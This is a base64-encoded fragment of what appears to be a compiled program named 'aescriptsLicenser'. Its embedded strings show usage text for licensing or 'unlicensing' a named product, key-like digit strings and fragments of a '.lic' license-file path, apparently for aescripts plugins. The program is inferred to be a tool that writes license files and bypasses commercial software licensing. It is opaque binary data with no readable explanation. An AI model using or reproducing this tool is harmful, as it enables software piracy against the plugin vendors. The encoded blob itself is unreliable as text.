AB0Grn/////8A/BSPiFyX8MSI21UPn//+jiEAAASIuFQPn//0iNeOhIOz0CJgAAdBq5//////APwUj4hcl/DEiNtUj5///otBAAAEiJ3+haEQAA6GERAADoMhEAAFVIieVBV0FWQVVBVFNIgez4AAAASYnXifNIifhIjb04////SI2VMP///0iJxuimEAAAQcYHAEHGRx4AQcZHQABBxkdKAEHGR2gAQcdHPAAAAABIjb0o////SI21OP///+h/EAAASI29KP///4ne6JjM//9BiMZIi4Uo////SI146Eg7PUwlAAB0Grn/////8A/BSPiFyX8MSI21UP///+j+DwAAMNtFhPYPhHkFAABIjb04////SI01eBQAADHSuQEAAADofw8AAEmJxUmNVQFIjb04////SI01VxQAALkBAAAA6GAPAABJicRJjVQkAUiNvTj///9IjTU3FAAAuQEAAADoQA8AAEmJxkmNVgFIjb04////SI01GBQAALkBAAAA6CEPAAAxyUmD/f9MD0TpSYP8/0wPROFMieJMCepJg/7/TA9E8UiFwA+UwUiD+P8PlMBMCfJ1DAjIMNuEwA+FwwQAAEiNvSD///9IjbU4////MdJMieno0Q4AAEmNf0pIi7Ug////6AsQAABMielI99FMAeFJ/8VIjb0Y////SI21OP///0yJ6uifDgAASIu1GP///0yJ/+jaDwAATInhSPfRTAHxSf/ESI29EP///0iNtTj///9MieLobg4AAEmNfx5Ii7UQ////6KgPAABIi4U4////SItI6En/xkiNvQj///9IjbU4////TIny6DoOAABNjXdoSIu1CP///0yJ9+hxDwAASIuFCP///0iLSOhIg8HxSI29AP///0iNtQj///+6DwAAAOgADgAATY1nQEiLtQD///9MiefoNw8AAEiLhQD///9Ii0joSIPB/UiNvfj+//9IjbUA////ugMAAADoxg0AAEiLnfj+//9Iid/oyw4AAEGJRzxIjXvoSDs9LiMAAHQXuP/////wD8FD+IXAfwlIjXWQ6OMNAABIjb3w/v//SI21AP///zHSuQMAAADodQ0AAEiNvQD///9IjbXw/v//6NoNAABIi4Xw/v//SI146Eg7PdYiAAB0F7n/////8A/BSPiFyX8JSI11mOiLDQAASIu1AP///0yJ5+hyDgAASI296P7//0iNtQj///8x0rkPAAAA6A4NAABIjb0I////SI216P7//+hzDQAASIuF6P7//0iNeOhIOz1vIgAAdBe5//////APwUj4hcl/CUiNdajoJA0AAEiLtQj///9MiffoCw4AAEiLhQD///9IjXjoSDs9NSIAAHQXuf/////wD8FI+IXJfwlIjXW46OoMAABIi4UI////SI146Eg7PQoiAAB0F7n/////8A/BSPiFyX8JSI11wOi/DAAASIuFEP///0iNeOhIOz3fIQAAdBe5//////APwUj4hcl/CUiNdcjolAwAAEiLhRj///9IjXjoSDs9tCEAAHQXuf/////wD8FI+IXJfwlIjXXQ6GkMAABIi4Ug////SI146LMBSDs9hyEAAA+E1QEAALn/////8A/BSPizAYXJD4/BAQAASI11sOgyDAAAswHpsQEAAEiJw+maAQAASInDSIuFKP///0iNeOhIOz1AIQAAD4R/AQAAuf/////wD8FI+IXJD49tAQAASI21YP///+lcAQAASInD6SsBAABIicPp9QAAAEiJw+m/AAAASInD6YkAAABIicPrWUiJw0iLhfD+//9IjXjoSDs94iAAAHRCuf/////wD8FI+IXJfzRIjXWg6ylIicNIi4Xo/v//SI146Eg7PbcgAAB0F7n/////8A/BSPiFyX8JSI11iOhsCwAASIuFAP///0iNeOhIOz2MIAAAdBe5//////APwUj4hcl/CUiNdYDoQQsAAEiLhQj///9IjXjoSDs9YSAAAHQauf/////wD8FI+IXJfwxIjbV4////6BMLAABIi4UQ////SI146Eg7PTMgAAB0Grn/////8A/BSPiFyX8MSI21cP///+jlCgAASIuFGP///0iNeOhIOz0FIAAAdBq5//////APwUj4hcl/DEiNtWj////otwoAAEiLhSD///9IjXjoSDs91x8AAHQauf/////wD8FI+IXJfwxIjbVY////6IkKAABIid/oIwsAALMB6CILAABIi4U4////SI146Eg7PZofAAB0Grn/////8A/BSPiFyX8MSI21QP///+hMCgAAiNhIgcT4AAAAW0FcQV1BXkFfXcNIicNIi4U4////SI146Eg7PVUfAAB0H7n/////8A/BSPiFyX8RSI21SP///+gHCgAA6wNIicNIid/oqAoAAFVIieVBV0FWQVVBVFNIgeyYCQAASIm1QPb//0iJ+0iLBScfAABIiwBIiUXQuP////+AOwAPhDMFAABIjb1Q////6Efv//9IiwXfHgAASIPAGEiJhYj9//8PtksBiY1M9v//RIo7SImdUPb//0iJhYD9//8x20yNpYD9//9MjS0MDgAA6wdEiDQYSP/Dg/s7d0JMiedMie66AQAAAOhrCQAARIq0HVD///9Ii4WA/f//g3j4AHjPTInn6DYJAABIi4WA/f//677rAusASInD6XACAABIi51A9v//SInf6BQKAABIjb2A/f//SIneSInC6BgJAABEi7VM9v//MdtMjaWA/f//6xpBD7bXidEPr8kwFBiNREkKMdJB9/ZBidf/w4nbSIuFgP3//0g7WOhzF4N4+AB40UyJ5+i3CAAASIuFgP3//+vASI29oP3//74YAAAA6BUJAABFMf9MjbWw/f//SIuFgP3//0w5eOgPhoEAAABIi4Ww/f//SItA6IuMBcj9//+D4bWDyQiJjAXI/f//SIuFsP3//0iLQOhIx4QFwP3//wIAAABIi4Ww/f//SItY6EmNPB7o/AcAAMaEHZD+//8wSIuFgP3//0IPtjQ4TIn36BYIAABJ/8frhOsASInDSI29oP3//+iECAAA6VABAABIjb14/f//SI21uP3//+isBwAASI29oP3//+hgCAAASI29gP3//0iNtXj9///o+QcAAEiLhXj9//9IjXjoSDs99RwAAEiLnVD2//90Grn/////8A/BSPiFyX8MSI21EP///+igBwAASI29cP3//0iNlWj9//9Iid7owAcAAEmJ3kiNvXD9//9IjZWI/f//MfboDAcAAEiLhXD9//9IjXjoSDs9khwAAHQauf/////wD8FI+IXJfwxIjbUY////6EQHAABIi7WI/f//SI296Pn//7oUAAAA6JIHAABIjb3w+f//6NIGAAA8AXUjSIu1gP3//0iLVuhIjb3o+f//6PMGAABIjb3o+f//6FkHAABIjb3o+f//6FkHAADp7gAAAEiJw0iLhXj9//9IjXjoSDs9BRwAAHQauf/////wD8FI+IXJfwxIjbUg////6LcGAABIi4WA/f//SI146Eg7PdcbAAB0Grn/////8A/BSPiFyX8MSI21mP3//+iJBgAASIuFiP3//0iNeOhIOz2pGwAAdBq5//////APwUj4hcl/DEiNtZD9///oWwYAAEiJ3+gBBwAASInDSIuFcP3//0iNeOhIOz1wGwAAdDW5//////APwUj4hcl/J0iNtSj////oIgYAAOsZ6xRIicNIjb3o+f//6HsGAADrBkmJ3kiJw0iJ3+ihBgAA6KIGAABIjb3g+f//SI2V2Pn//0yJ9ugaBgAASI294Pn//0iNlYj9//++AQAAAOhmBQAASIuF4Pn//0iNeOhIOz3sGgAAdBq5//////APwUj4hcl/DEiNtTj////ongUAAEiLtYj9//9Ijb1Y9v//uhQAAADo7AUAAEiNvWD2///oLAUAADwBdSNIi7WA/f//SItW6EiNvVj2///oTQUAAEiNvVj2///oswUAAEiNvVj2///oswUAAOtWSInDSIuF4Pn//0iNeOhIOz1iGgAAdDK5//////APwUj4hcl/JEiNtUj////oFAUAAOsW6xFIicNIjb1Y9v//6G0FAADrA0iJw0iJ3+iWBQAA6JcFAABIi4WA/f//SI146Eg7PQ8aAAB0Grn/////8A/BSPiFyX8MSI21QP///+jBBAAASIuNiP3//0iNeegxwEg7Pd8ZAAB0Hrr/////8A/BUfgxwIXSfw5IjbUw////6I8EAAAxwEiLDdgZAABIiwlIO03QdRdIgcSYCQAAW0FcQV1BXkFfXcPo9gQAAOgbBQAA6OwEAABVSInlQVdBVlNIgeyIBAAASYnWQYn3SIn7SIsFjhkAAEiLAEiJReBIjTUECQAATIn3MdLoQgQAAEiLBU8ZAABIg8AYSImFuPv//0iNvbD7//9Iid7oRQQAAEGA/wF1WEiNjWD7//+/A4D//75mZXJwMdLo5wQAAOtWSInDSIuFsPv//0iNeOhIOz0AGQAAD4RzAQAAuf/////wD8FI+IXJD49hAQAASI21wPv//+iqAwAA6VABAABIjY1g+///vwWA//++ZmVycDHS6I8EAABIjb1g+///SI214Pv//7oABAAA6H0EAABIjZ3g+///SInf6GIEAABIjb24+///SIneSInC6HIDAABIjb24+///SI01HQgAALoFAAAA6E4DAABIjb24+///SI01CwgAALoCAAAA6DYDAABIjb24+///SI019gcAALoCAAAA6B4DAABIjb24+///SI014QcAALoCAAAA6AYDAABIjb24+///SI01zAcAALoDAAAA6O4CAABIjb24+///SI01uAcAALoBAAAA6NYCAABIjb24+///SI21sPv//+jJAgAASI29uPv//0iNNY8HAAC6BAAAAOirAgAASIuFsPv//0iNeOhIOz25FwAAdBq5//////APwUj4hcl/DEiNtcj7///oawIAALMBSI21uPv//0yJ9+h+AgAA6xJIicNIid/o7wIAADDb6O4CAABIi4W4+///SI146Eg7PWYXAAB0Grn/////8A/BSPiFyX8MSI212Pv//+gYAgAASIsFYxcAAEiLAEg7ReB1SYjYSIHEiAQAAFtBXkFfXcNIicNIi4W4+///SI146Eg7PRUXAAB0Grn/////8A/BSPiFyX8MSI210Pv//+jHAQAASInf6G0CAADodAIAAFVIieVBV0FWQVRTSInzSYn/STnfdQ1MizXPFgAASYPGGOtMTCn7SInfMfbokAEAAEmJxE2NdCQYSIP7AXUIQYoHQYgG6w5MifdMif5IidroRAIAAEHHRCQQAAAAAEmJHCRIiwV8FgAAigBBiEQcGEyJ8FtBXEFeQV9dw5BVSInlQVdBVkFUU0iJ80mJ/kk53nUNTIs9UxYAAEmDxxjrVk2F9nUFSTnedVhMKfNIid8x9ugKAQAASYnETY18JBhIg/sBdQhBigZBiAfrDkyJ/0yJ9kiJ2ui+AQAAQcdEJBAAAAAASYkcJEiLBfYVAACKAEGIRBwYTIn4W0FcQV5BX13DSI09SQUAAOg3AQAAkJCQkJCQkJCQkJCQkJCQVUiJ5VNQSI0dRRgAAEiJ3+gHAQAASIs9vBUAAEiNFX2l//9Iid5Ig8QIW13pIQEAAJD/JdAVAAD/JdIVAAD/JdQVAAD/JdYVAAD/JdgVAAD/JdoVAAD/JdwVAAD/Jd4VAAD/JeAVAAD/JeIVAAD/JeQVAAD/JeYVAAD/JegVAAD/JeoVAAD/JewVAAD/Je4VAAD/JfAVAAD/JfIVAAD/JfQVAAD/JfYVAAD/JfgVAAD/JfoVAAD/JfwVAAD/Jf4VAAD/JQAWAAD/JQIWAAD/JQQWAAD/JQYWAAD/JQgWAAD/JQoWAAD/JQwWAAD/JQ4WAAD/JRAWAAD/JRIWAAD/JRQWAAD/JRYWAAD/JRgWAAD/JRoWAAD/JRwWAAD/JR4WAAD/JSAWAAD/JSIWAAD/JSQWAAD/JSYWAAD/JSgWAAD/JSoWAAD/JSwWAAD/JS4WAAD/JTAWAAD/JTIWAAD/JTQWAAD/JTYWAAD/JTgWAAD/JToWAAD/JTwWAAD/JT4WAAD/JUAWAAD/JUIWAAD/JUQWAAD/JUYWAAD/JUgWAAD/JUoWAAD/JUwWAABMjR1NFAAAQVP/JT0UAACQaAAAAADp5v///2gaAAAA6dz///9oMwAAAOnS////aHAAAADpyP///2iwAAAA6b7///9o5QAAAOm0////aBsBAADpqv///2g/AQAA6aD///9oVgEAAOmW////aHwBAADpjP///2iSAQAA6YL///9opgEAAOl4////aLwBAADpbv///2jVAQAA6WT///9o9gEAAOla////aBQCAADpUP///2g7AgAA6Ub///9oYgIAAOk8////aHkCAADpMv///2iTAgAA6Sj///9orQIAAOke////aMcCAADpFP///2jhAgAA6Qr///9o/QIAAOkA////aBcDAADp9v7//2gyAwAA6ez+//9oTgMAAOni/v//aGMDAADp2P7//2h1AwAA6c7+//9osAMAAOnE/v//aPoDAADpuv7//2gxBAAA6bD+//9obAQAAOmm/v//aLYEAADpnP7//2jtBAAA6ZL+//9oPQUAAOmI/v//aH0FAADpfv7//2idBQAA6XT+//9o8wUAAOlq/v//aBgGAADpYP7//2gAAAAA6Vb+//9oAAAAAOlM/v//aDAGAADpQv7//2hKBgAA6Tj+//9oYgYAAOku/v//aHkGAADpJP7//2iOBgAA6Rr+//9opwYAAOkQ/v//aLQGAADpBv7//2jBBgAA6fz9//9ozgYAAOny/f//aOIGAADp6P3//2j1BgAA6d79//9oBAcAAOnU/f//aB0HAADpyv3//2gtBwAA6cD9//9oPAcAAOm2/f//aEsHAADprP3//2haBwAA6aL9//9obwcAAOmY/f//dXNhZ2U6IGFlc2NyaXB0c0xpY2Vuc2VyIFtuYW1lXSBbbGljZW5zZV0AW25hbWVdIGlzIHRoZSBuYW1lIG9mIHRoZSBwcm9kdWN0IHRvIGJlIGxpY2Vuc2VkAFtsaWNlbnNlXSBpcyB0aGUgbGljZW5zZSBzdHJpbmcgZm9yIHRoZSBwcm9kdWN0AGlmIHlvdSB3YW50IHRvIHVubGljZW5zZSBhIHByb2R1Y3QsIGVudGVyICctJyBmb3IgW2xpY2Vuc2VdADElaQA3NjU0MzIxMjM0NTY3ODk4ADMxOTQ4MzcyNTEyOTAzNTYAMDEyMzQ1Njc4OUFCQ0RFRgAlWAAlbGx1AGJhc2ljX3N0cmluZzo6ZXJhc2UAJXUAKgAwAGJhc2ljX3N0cmluZzo6X1NfY29uc3RydWN0IE5VTEwgbm90IHZhbGlkAGJhc2ljX3N0cmluZzo6c3Vic3RyAAAvY29tLgBhZQBzYwByaQBwdHMALgAubGljAAD/m7wAAzQAAAAAYQAAAAAAAAAAYQAAAC8AAACoAAAAAKsAAAAIAAAAuwAAAAGzAAAADQAAAAAAAAAAAQAAAAAA/5tdA1t0AAAAEwAAAHsCAAAAhwAAAA4AAAC2AAAAAJUAAAALAAAAuwAAAACgAAAAUQEAAAAAAAAA8QEAABQAAAA2AgAAABMCAAAJAAAAOAIAAAAcAgAAagAAAAAAAAAA/5u8AAM0AAAAABUAAAAAAAAAABUAAAALAAAAKAAAAAArAAAACAAAADsAAAABMwAAAA0AAAAAAAAAAAEAAAAAAP+bz4kAA8YJJwAAABMAAABEJgAAAHYAAADOAAAAbwQAAABEAQAAEwAAAIsDAAAAjgEAABkAAABvBAAAAKcBAAATAAAAxAMAAADxAQAAGQAAAG8EAAAACgIAABMAAAD9AwAAAFYCAAAZAAAAbwQAAABvAgAAEwAAADYEAAAAuwIAABwAAABvBAAAANcCAAATAAAADSUAAABMAwAALwAAAOwMAAAAfQQAACgAAADuDAAAAO0EAAAdAAAADSUAAAAKBQAAHQAAACwNAAAAJwUAABoAAACsJAAAAEEFAAATAAAANA0AAACCBQAAGgAAAKwkAAAAnAUAABoAAAByDQAAALYFAAAaAAAAeg0AAADQBQAAEwAAAH8NAAAA4wUAAEcAAACEDQAAAO0GAAAcAAAAeSQAAAAJBwAAEwAAAEwOAAAAcQcAABoAAAB5JAAAAJoHAAAaAAAARiQAAAC0BwAAGgAAAIoOAAAAzgcAABMAAACPDgAAAOEHAAAZAAAAlA4AAACECAAAGgAAAEYkAAAAnggAABoAAAAuDwAAALgIAAAaAAAANg8AAADSCAAAEwAAADsPAAAA5QgAABMAAABADwAAAL0JAABTAAAARiQAAAAdCgAADAAAANwUAAAAjAoAABYAAAAaFQAAANkKAAAKAAAAHxUAAADjCgAAEwAAACcVAAAAJAsAABMAAAAfFQAAADcLAAATAAAAYBUAAABKCwAAEwAAAGUVAAAA0gsAABMAAADOFQAAADcMAABmAAAAzBUAAAAZEAAAhAAAAM4VAAAAqBAAABsAAACJIwAAAMMQAAATAAAA1hUAAAAiEQAAEwAAAIkjAAAANREAABMAAAAFIAAAAEgRAAATAAAACiAAAAC3EQAAGgAAAIkjAAAA0REAABoAAAB2IAAAAPYRAAAbAAAAeyAAAAAREgAAGgAAAIAgAAAA1xIAABYAAAAaIQAAAO0SAAATAAAAKCMAAAAAEwAAEQAAACIhAAAAQhMAAB0AAABgIQAAAGYTAAAWAAAAaCEAAACDEwAAFgAAAG0hAAAAoBMAABYAAABvIQAAAL0TAAAWAAAAcSEAAADaEwAAFgAAAHMhAAAA9xMAABYAAAB1IQAAAA0UAAATAAAACCMAAAAgFAAAHQAAAKEhAAAAlRQAABYAAADfIQAAAL0UAAAaAAAAFBYAAAA+FgAA4AAAAL0fAAAANhcAACsAAAAZHwAAAMwXAAAWAAAARh8AAAD0FwAAGgAAAOEYAAAAORgAABAAAABLGAAAAIsYAAAmAAAATRgAAADmGAAAEwAAAOQZAAAAJxkAABoAAADrHgAAAF4ZAAAMAAAAHxoAAACVGQAADAAAAB0aAAAAuxkAACEAAAAfGgAAAIsaAAATAAAASx8AAADRGgAADQAAAJkfAAAAUhsAAAUAAADkIQAAAMwbAAANAAAA4yIAAAA3HwAACAAAAPYfAAABgR8AAA0AAAAAIAAAAaUfAAANAAAA+x8AAAGyHwAA3QEAAAAAAAAAjyEAAAgAAAAmJgAAAfUhAAAFAAAAKyYAAAGbIgAABQAAALkiAAAAziIAAAUAAAAwJgAAAe8iAAANAAAAOiYAAAEQIwAADQAAADUmAAABHSMAADIDAAAAAAAAAAEAAAAAAP+bnAMDkwMAAAAAbAAAAAAAAAAAbAAAABYAAAABCQAAAIIAAAAVAAAAVQEAAADMAAAAEQAAAJMBAAAA8QAAAF8AAACiAQAAAKcBAAAWAAAA8AgAAAC9AQAAGAAAADgCAAAACgIAABEAAACCBAAAAXkCAAAMAAAAbQkAAAGKAgAAYQAAAHYCAAAB6wIAAAwAAACCBAAAARgDAAAdAAAAAAcAAAA1AwAAEwAAAAUHAAAAxAMAAA0AAAApBQAAAPADAAAbAAAALgUAAAAWBAAADAAAADMFAAAAUAQAAB4AAAAuBQAAAG4EAAAIAAAAKQUAAAB2BAAAHQAAAAAAAAAAkwQAAAUAAACiAQAAAJgEAAAMAAAAkwEAAABkBQAADAAAAKsFAAABcAUAAEAAAAAAAAAAALAFAAATAAAAQwcAAADoBgAADAAAAJ0BAAAAgQcAADYAAACYAQAAABIIAAApAAAAogEAAABJCAAADwAAALsIAAAAXwgAABMAAAC9CAAAAPMIAAAMAAAAbQkAAAH/CAAAcwAAAAAAAAAAAQAAAAAA/5vjgAADWwAAAABKAAAAAAAAAABKAAAADwAAAAQCAAABXwAAAGQBAAB5AAAAAfMBAAAPAAAAZAIAAAACAgAADwAAAAAAAAAAEQIAAAUAAABkAgAAABYCAACMAAAAAAAAAAABAAAAAAD/m8wBA8MBHAAAABYAAACdBgAAAGAAAAAFAAAAdwQAAAFlAAAAEQAAAH8EAAABrwAAAM4AAAB3BAAAAZYBAAAZAAAAuAQAAAHHAQAAGQAAAMAEAAAB+wEAABkAAADIBAAAATICAAAcAAAA0AQAAAFsAgAAbQAAANgEAAAB2QIAABMAAADdBAAAASYDAAAaAAAA2AQAAAFAAwAAEwAAAAgFAAABUwMAANACAAAAAAAAACMGAAAFAAAAagYAAAAoBgAAgAAAAAAAAAAAAQAAAAAA/5v1goCAAAPsAgAAAACRAAAAAAAAAACRAAAALQAAAMkAAAAA4gAAABIAAADLAAAAADUBAAAIAAAAxwAAAABGAQAAEQAAAMsAAAAAtwEAACEAAADdAQAAAOIBAAAMAAAAmQUAAAHzAQAAEwAAAN8BAAAABgIAAAwAAADLAAAAABICAAATAAAAEgMAAABaAgAAFgAAAO0DAAABcAIAABgAAACnAwAAAb0CAAARAAAA2gMAAAHpAgAAGAAAANwDAAABAQMAAAwAAADaAwAAAQ0DAADSAAAAAAAAAADfAwAADAAAAI8FAAAB6wMAABAAAAAAAAAAAPsDAAAFAAAAywAAAAAABAAAFgAAAPsEAAABFgQAABgAAAC1BAAAAWMEAAARAAAA6AQAAAGPBAAAGAAAAOoEAAABpwQAAAwAAADoBAAAAe0EAAAMAAAAjwUAAAH5BAAADQAAAAAAAAAABgUAAAUAAADLAAAAAAsFAACTAAAAAAAAAAABAAAAAAABAAAAHAAAAAMAAAAoAAAAAQAAACwAAAACAAAA0VgFUQAAAAEBAAEBSHAAADASAACEAAAARAAAAJJaAAAAAAAAhAAAACEUAADwXwAA4RQAADBgAABnFwAA0GAAADs/AACQYAAA6kAAAKRlAABcSgAArGcAAARRAAB8aAAAolYAAERnAAADAAAADAATAFgABwAAAAAJPAAACLABAALhAQAB8QEAALECAAA3BQAAhisAB6QsAAELLQAGTC0AAZQtAAUwLgACui4AACw4AADUPgAAckQABBRHAAMwSAACEQsEAWEBA1FhAQMBIQACUdFYBQEhAAIBAAAAABQAAAAAAAAAAXpSAAF4EAEQDAcIkAEAACQAAAAcAAAAXKf///////9pAQAAAAAAAABBDhCGAkMNBkqDBI4DAAAkAAAARAAAAKio////////MQAAAAAAAAAAQQ4QhgJDDQZCgwMAAAAAFAAAAAAAAAABelIAAXgQARAMBwiQAQAAJAAAABwAAACZqP///////wgAAAAAAAAAAEEOEIYCQw0GAAAAAAAAACQAAABEAAAAeaj///////8IAAAAAAAAAABBDhCGAkMNBgAAAAAAAAAcAAAAAAAAAAF6UExSAAF4EAebdQQAABAQDAcIkAEAADQAAAAkAAAAOaj////////AAAAAAAAAAAj38////////0EOEIYCQw0GTYMHjAaNBY4EjwMAAAAANAAAAFwAAADBqP///////4YCAAAAAAAACP/z////////QQ4QhgJDDQZNgweMBo0FjgSPAwAAAAAsAAAAlAAAAOPS////////QAAAAAAAAAAIJ/T///////9BDhCGAkMNBkODBI4DAAA0AAAAxAAAAN+q////////TyYAAAAAAAAIN/T///////9BDhCGAkMNBlCDB4wGjQWOBI8DAAAAACwAAABkAQAA9tD///////8eAQAAAAAAAABBDhCGAkMNBkqDB4wGjQWOBI8DAAAAACQAAACUAQAA5NH///////8LAAAAAAAAAABBDhCGAkMNBgAAAAAAAAAkAAAAvAEAAMfR////////OwAAAAAAAAAAQQ4QhgJDDQYAAAAAAAAAJAAAAOQBAADa0f///////wsAAAAAAAAAAEEOEIYCQw0GAAAAAAAAACQAAAAMAgAAvdH///////8LAAAAAAAAAABBDhCGAkMNBgAAAAAAAAAkAAAANAIAAKDR////////CwAAAAAAAAAAQQ4QhgJDDQYAAAAAAAAAFAAAAAAAAAABelIAAXgQARAMBwiQAQAAJAAAABwAAACs0f///////0gAAAAAAAAAAEEOEIYCQw0GAAAAAAAAACQAAABEAAAAzNH///////+TAAAAAAAAAABBDhCGAkMNBkaDBY4EjwMkAAAAbAAAAEDS////////MQAAAAAAAAAAQQ4QhgJDDQZCgwMAAAAAFAAAAAAAAAABelIAAXgQARAMBwiQAQAAJAAAABwAAAAx0v///////1kAAAAAAAAAAEEOEIYCQw0GQoMDAAAAABwAAAAAAAAAAXpQTFIAAXgQB5u1AQAAEBAMBwiQAQAANAAAACQAAABC0v///////3IJAAAAAAAACOv2////////QQ4QhgJDDQZQgweMBo0FjgSPAwAAAAAsAAAAXAAAAMLn////////ogIAAAAAAAAIU/j///////9BDhCGAkMNBkyDBY4EjwM0AAAAjAAAAEzb////////qAYAAAAAAAAIi/j///////9BDhCGAkMNBlCDB4wGjQWOBI8DAAAAADQAAADEAAAAvOH///////+eBQAAAAAAAAgj+f///////0EOEIYCQw0GUIMHjAaNBY4EjwMAAAAALAAAADwBAADE6f///////3sAAAAAAAAAAEEOEIYCQw0GR4MGjAWOBI8DAAAAAAAALAAAAGwBAAAQ6v///////5EAAAAAAAAAAEEOEIYCQw0GR4MGjAWOBI8DAAAAAAAAJAAAAJwBAACA6v///////zEAAAAAAAAAAEEOEIYCQw0GQoMDAAAAAAAAAAABAAAAkHIAAAEAAACYcgAAAQAAAKByAAABAAAAqHIAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOz8AAAEAAACiVgAAAQAAAERZAAABAAAAHFwAAAEAAAAmXAAAAQAAADBcAAABAAAAOlwAAAEAAABEXAAAAQAAAE5cAAABAAAAWFwAAAEAAABiXAAAAQAAAGxcAAABAAAAdlwAAAEAAACAXAAAAQAAAIpcAAABAAAAlFwAAAEAAACeXAAAAQAAAKhcAAABAAAAslwAAAEAAAC8XAAAAQAAAMZcAAABAAAA0FwAAAEAAADaXAAAAQAAAORcAAABAAAA7lwAAAEAAAD4XAAAAQAAAAJdAAABAAAADF0AAAEAAAAWXQAAAQAAACBdAAABAAAAKl0AAAEAAAA0XQAAAQAAAD5dAAABAAAASF0AAAEAAABSXQAAAQAAAFxdAAABAAAAZl0AAAEAAABwXQAAAQAAAHpdAAABAAAAhF0AAAEAAACOXQAAAQAAAJhdAAABAAAAol0AAAEAAACsXQAAAQAAALZdAAABAAAAwF0AAAEAAADKXQAAAQAAANRdAAABAAAA3l0AAAEAAADoXQAAAQAAAPJdAAABAAAA/F0AAAEAAAAGXgAAAQAAABBeAAABAAAAGl4AAAEAAAAkXgAAAQAAAC5eAAABAAAAOF4AAAEAAABCXgAAAQAAAExeAAABAAAAVl4AAAEAAABgXgAAAQAAAGpeAAABAAAA4BMAAAEAAABgQAAAAQAAAGBaAAABAAAAAAAAAAAAAAAYAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA